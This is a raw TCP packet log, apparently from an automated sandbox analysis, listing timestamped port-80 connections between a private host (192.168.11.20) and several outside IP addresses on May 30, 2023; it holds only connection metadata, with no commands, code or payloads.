                                                                                                                    May 30, 2023 11:09:20.851191998 CEST8049784216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:09:20.851236105 CEST8049784216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:09:20.851277113 CEST8049784216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:09:20.851471901 CEST4978480192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:09:20.851516008 CEST8049784216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:09:20.851577044 CEST8049784216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:09:20.851588011 CEST4978480192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:09:20.851620913 CEST8049784216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:09:20.851794958 CEST8049784216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:09:20.851840973 CEST8049784216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:09:20.851959944 CEST8049784216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:09:20.852006912 CEST8049784216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:09:21.009488106 CEST8049784216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:09:21.009867907 CEST8049784216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:09:21.009958982 CEST8049784216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:09:21.545290947 CEST8049784216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:09:21.545418978 CEST8049784216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:09:21.545533895 CEST4978480192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:09:22.047558069 CEST4978480192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:09:23.063077927 CEST4978580192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:09:23.220158100 CEST8049785216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:09:23.220338106 CEST4978580192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:09:23.220489025 CEST4978580192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:09:23.377403021 CEST8049785216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:09:23.908571959 CEST8049785216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:09:23.908633947 CEST8049785216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:09:23.908934116 CEST4978580192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:09:23.909126043 CEST4978580192.168.11.20216.108.231.108
                                                                                                                    May 30, 2023 11:09:24.066440105 CEST8049785216.108.231.108192.168.11.20
                                                                                                                    May 30, 2023 11:09:29.450658083 CEST4978680192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:29.715111971 CEST8049786183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:29.715490103 CEST4978680192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:29.715589046 CEST4978680192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:29.979906082 CEST8049786183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:29.982260942 CEST8049786183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:29.982342005 CEST8049786183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:29.982393980 CEST8049786183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:29.982626915 CEST4978680192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:31.217417955 CEST4978680192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:32.233023882 CEST4978780192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:32.500957966 CEST8049787183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:32.501245975 CEST4978780192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:32.501301050 CEST4978780192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:32.769201994 CEST8049787183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:32.771543980 CEST8049787183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:32.771611929 CEST8049787183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:32.771665096 CEST8049787183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:32.771826982 CEST4978780192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:32.771826982 CEST4978780192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:34.013639927 CEST4978780192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:35.029231071 CEST4978880192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:35.307713985 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:35.307986975 CEST4978880192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:35.308547974 CEST4978880192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:35.308645964 CEST4978880192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:35.587227106 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:35.587287903 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:35.587333918 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:35.587373972 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:35.587405920 CEST4978880192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:35.587455988 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:35.587465048 CEST4978880192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:35.587501049 CEST4978880192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:35.587568045 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:35.587609053 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:35.587647915 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:35.587673903 CEST4978880192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:35.587730885 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:35.587842941 CEST4978880192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:35.588047028 CEST4978880192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:35.866302013 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:35.866368055 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:35.866410971 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:35.866475105 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:35.866724968 CEST4978880192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:35.866806984 CEST4978880192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:35.866940975 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:35.866996050 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:35.867038012 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:35.867082119 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:35.867122889 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:35.867153883 CEST4978880192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:35.867188931 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:35.867232084 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:35.867270947 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:35.867311001 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:35.867325068 CEST4978880192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:35.867393017 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:35.867433071 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:36.145898104 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:36.146015882 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:36.146405935 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:36.146471024 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:36.146512985 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:36.146553040 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:36.148807049 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:36.148870945 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:36.148921967 CEST8049788183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:36.149157047 CEST4978880192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:36.809834003 CEST4978880192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:37.825578928 CEST4978980192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:38.090519905 CEST8049789183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:38.090727091 CEST4978980192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:38.090861082 CEST4978980192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:38.358098030 CEST8049789183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:38.359308004 CEST8049789183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:38.359396935 CEST8049789183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:38.359451056 CEST8049789183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:38.359707117 CEST4978980192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:38.359707117 CEST4978980192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:38.359961033 CEST4978980192.168.11.20183.90.238.43
                                                                                                                    May 30, 2023 11:09:38.625188112 CEST8049789183.90.238.43192.168.11.20
                                                                                                                    May 30, 2023 11:09:43.422051907 CEST4979080192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:09:43.449773073 CEST804979084.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:09:43.450028896 CEST4979080192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:09:43.450088978 CEST4979080192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:09:43.477969885 CEST804979084.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:09:43.478082895 CEST804979084.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:09:45.979893923 CEST4979180192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:09:46.007915974 CEST804979184.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:09:46.008187056 CEST4979180192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:09:46.008224010 CEST4979180192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:09:46.036135912 CEST804979184.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:09:46.036349058 CEST804979184.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:09:48.526329041 CEST4979280192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:09:48.553850889 CEST804979284.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:09:48.554019928 CEST4979280192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:09:48.554600954 CEST4979280192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:09:48.554619074 CEST4979280192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:09:48.554666996 CEST4979280192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:09:48.582191944 CEST804979284.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:09:48.582350016 CEST4979280192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:09:48.582381010 CEST804979284.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:09:48.582509995 CEST4979280192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:09:48.582530975 CEST804979284.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:09:48.610035896 CEST804979284.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:09:48.610238075 CEST804979284.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:09:51.072645903 CEST4979380192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:09:51.100414038 CEST804979384.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:09:51.100759029 CEST4979380192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:09:51.101198912 CEST4979380192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:09:51.129046917 CEST804979384.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:09:51.129344940 CEST804979384.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:09:51.129426956 CEST804979384.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:09:51.129487038 CEST804979384.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:09:51.129548073 CEST804979384.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:09:51.129602909 CEST804979384.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:09:51.129659891 CEST804979384.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:09:51.129714966 CEST804979384.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:09:51.129762888 CEST4979380192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:09:51.129770041 CEST804979384.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:09:51.129764080 CEST4979380192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:09:51.129815102 CEST804979384.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:09:51.130142927 CEST4979380192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:09:51.130345106 CEST4979380192.168.11.2084.32.84.32
                                                                                                                    May 30, 2023 11:09:51.158021927 CEST804979384.32.84.32192.168.11.20
                                                                                                                    May 30, 2023 11:09:56.254371881 CEST4979480192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:09:56.300931931 CEST8049794185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:09:56.301127911 CEST4979480192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:09:56.301322937 CEST4979480192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:09:56.347666979 CEST8049794185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:09:56.348151922 CEST8049794185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:09:56.348242998 CEST8049794185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:09:56.348381996 CEST4979480192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:09:57.805373907 CEST4979480192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:09:58.820931911 CEST4979580192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:09:58.867887974 CEST8049795185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:09:58.868155956 CEST4979580192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:09:58.868215084 CEST4979580192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:09:58.914906025 CEST8049795185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:09:58.914973021 CEST8049795185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:09:58.915263891 CEST8049795185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:09:58.915457964 CEST4979580192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:10:00.382849932 CEST4979580192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:10:01.398614883 CEST4979680192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:10:01.445365906 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.445674896 CEST4979680192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:10:01.446305990 CEST4979680192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:10:01.446399927 CEST4979680192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:10:01.493149042 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.493170023 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.493182898 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.493196011 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.493207932 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.493385077 CEST4979680192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:10:01.493454933 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.493474960 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.493489027 CEST4979680192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:10:01.493508101 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.493896008 CEST4979680192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:10:01.532804012 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.533041954 CEST4979680192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:10:01.540178061 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.540237904 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.540280104 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.540319920 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.540359974 CEST4979680192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:10:01.540395021 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.540438890 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.540477991 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.540520906 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.540535927 CEST4979680192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:10:01.540620089 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.540663004 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.540695906 CEST4979680192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:10:01.540739059 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.540785074 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.540824890 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.579545975 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.587116003 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.588547945 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.588694096 CEST8049796185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:01.588906050 CEST4979680192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:10:02.960417986 CEST4979680192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:10:03.976042986 CEST4979780192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:10:04.022597075 CEST8049797185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:04.022806883 CEST4979780192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:10:04.022859097 CEST4979780192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:10:04.069587946 CEST8049797185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:04.069657087 CEST8049797185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:04.069709063 CEST8049797185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:04.070060968 CEST4979780192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:10:04.070111036 CEST4979780192.168.11.20185.106.208.3
                                                                                                                    May 30, 2023 11:10:04.116564035 CEST8049797185.106.208.3192.168.11.20
                                                                                                                    May 30, 2023 11:10:09.500705957 CEST4979880192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:09.665549040 CEST8049798162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:09.665862083 CEST4979880192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:09.665952921 CEST4979880192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:09.830810070 CEST8049798162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:09.841588020 CEST8049798162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:09.841666937 CEST8049798162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:09.841726065 CEST8049798162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:09.841778994 CEST8049798162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:09.841829062 CEST8049798162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:09.842044115 CEST4979880192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:11.177290916 CEST4979880192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:12.193044901 CEST4979980192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:12.358520031 CEST8049799162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:12.358793020 CEST4979980192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:12.358854055 CEST4979980192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:12.524512053 CEST8049799162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:12.534517050 CEST8049799162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:12.534601927 CEST8049799162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:12.534667015 CEST8049799162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:12.534722090 CEST8049799162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:12.534770012 CEST8049799162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:12.534785032 CEST4979980192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:12.534869909 CEST4979980192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:13.864249945 CEST4979980192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:14.879951000 CEST4980080192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:15.045749903 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.046086073 CEST4980080192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:15.046648979 CEST4980080192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:15.046735048 CEST4980080192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:15.212199926 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.212265968 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.212308884 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.212348938 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.212363958 CEST4980080192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:15.212389946 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.212436914 CEST4980080192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:15.212472916 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.212492943 CEST4980080192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:15.212640047 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.212678909 CEST4980080192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:15.212682009 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.212723017 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.212838888 CEST4980080192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:15.213017941 CEST4980080192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:15.377940893 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.378006935 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.378050089 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.378089905 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.378139973 CEST4980080192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:15.378155947 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.378226995 CEST4980080192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:15.378237009 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.378283978 CEST4980080192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:15.378293037 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.378334999 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.378376007 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.378488064 CEST4980080192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:15.378612041 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.378655910 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.378884077 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.379051924 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.419977903 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.543981075 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.544130087 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.544218063 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.544291019 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.544342995 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.544599056 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.547918081 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.548002005 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.548098087 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.548156023 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.548207045 CEST8049800162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:15.548271894 CEST4980080192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:15.548445940 CEST4980080192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:16.551373959 CEST4980080192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:17.566924095 CEST4980180192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:17.732831955 CEST8049801162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:17.733095884 CEST4980180192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:17.733148098 CEST4980180192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:17.898883104 CEST8049801162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:17.907572031 CEST8049801162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:17.907623053 CEST8049801162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:17.907661915 CEST8049801162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:17.907713890 CEST8049801162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:17.907758951 CEST8049801162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:17.907795906 CEST8049801162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:17.907839060 CEST8049801162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:17.907885075 CEST8049801162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:17.907893896 CEST4980180192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:17.907893896 CEST4980180192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:17.907924891 CEST8049801162.215.249.40192.168.11.20
                                                                                                                    May 30, 2023 11:10:17.907938004 CEST4980180192.168.11.20162.215.249.40
                                                                                                                    May 30, 2023 11:10:17.907957077 CEST8049801162.215.249.40192.168.11.20
